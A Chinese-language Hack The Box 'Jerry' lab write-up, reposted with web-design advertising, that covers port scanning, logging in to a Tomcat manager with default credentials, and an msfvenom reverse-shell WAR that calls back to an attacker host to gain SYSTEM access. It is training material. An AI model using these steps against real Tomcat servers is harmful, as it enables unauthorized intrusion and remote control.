本篇內(nèi)容主要講解“HTB的Jerry滲透測試是什么”，感興趣的朋友不妨來看看。本文介紹的方法操作簡單快捷，實用性強(qiáng)。下面就讓小編來帶大家學(xué)習(xí)“HTB的Jerry滲透測試是什么”吧!

創(chuàng)新互聯(lián)一直通過網(wǎng)站建設(shè)和網(wǎng)站營銷幫助企業(yè)獲得更多客戶資源。 以"深度挖掘，量身打造，注重實效"的一站式服務(wù)，以成都網(wǎng)站設(shè)計、成都網(wǎng)站建設(shè)、移動互聯(lián)產(chǎn)品、營銷型網(wǎng)站建設(shè)服務(wù)為核心業(yè)務(wù)。10多年網(wǎng)站制作的經(jīng)驗，使用新網(wǎng)站建設(shè)技術(shù)，全新開發(fā)出的標(biāo)準(zhǔn)網(wǎng)站，不但價格便宜而且實用、靈活，特別適合中小公司網(wǎng)站制作。網(wǎng)站管理系統(tǒng)簡單易用，維護(hù)方便，您可以完全操作網(wǎng)站資料，是中小公司快速網(wǎng)站建設(shè)的選擇。

基礎(chǔ)信息

簡介：Hack The Box是一個在線滲透測試平臺?？梢詭椭闾嵘凉B透測試技能和黑盒測試技能，平臺環(huán)境都是模擬的真實環(huán)境，有助于自己更好的適應(yīng)在真實環(huán)境的滲透
鏈接：https://www.hackthebox.eu/home/machines/profile/144
描述：

前言

本次演練使用kali系統(tǒng)按照滲透測試的過程進(jìn)行操作，通過nmap發(fā)現(xiàn)端口開放了tomcat8080端口,使用密碼登錄tomcat，使用msfvenom 生成war文件上傳到tomcat中，通過反彈獲取shell。

一、信息收集

1、靶機(jī)ip

IP地址為：10.10.10.95

2、靶機(jī)端口與服務(wù)

nmap -sV -sS -T4 -O -A 10.10.10.95

PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

3、網(wǎng)站信息收集

查看8080端口

通過dirsearch進(jìn)行目錄掃描獲取網(wǎng)站目錄

這里我列出了部分需要的目錄

/host-manager/html
/manager/html
/manager/

二、漏洞探測與利用

1、生成木馬文件

進(jìn)入/host-manager/html目錄發(fā)現(xiàn)需要賬號密碼

點擊取消后，再返回界面發(fā)現(xiàn)賬號與密碼

username="tomcat"
password="s3cret"
使用該密碼進(jìn)行登錄，返回403頁面無法正常進(jìn)行登錄

最后在/manager/目錄下成功登錄

發(fā)現(xiàn)可以上傳war格式文件
使用msfvenom生成shell文件

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.2 LPORT=4444 -f war > shell.war

2、使用msf獲取shell

首先設(shè)置好msf，使用msf監(jiān)聽4444端口獲取反彈的shell

在登陸頁面上傳war文件

上傳成功后點擊shell

成功獲取到shell

三、提權(quán)

使用這種方式所獲取的直接是authority權(quán)限可直接查看root.txt

進(jìn)入 \Users\Administrator\Desktop目錄發(fā)現(xiàn)沒有root.txt但是存在flags

進(jìn)入flags目錄使用type命令查看2 for the price of 1.txt文件
獲取到root.txt與user.txt

到此，相信大家對“HTB的Jerry滲透測試是什么”有了更深的了解，不妨來實際操作一番吧！這里是創(chuàng)新互聯(lián)網(wǎng)站，更多相關(guān)內(nèi)容可以進(jìn)入相關(guān)頻道進(jìn)行查詢，關(guān)注我們，繼續(xù)學(xué)習(xí)！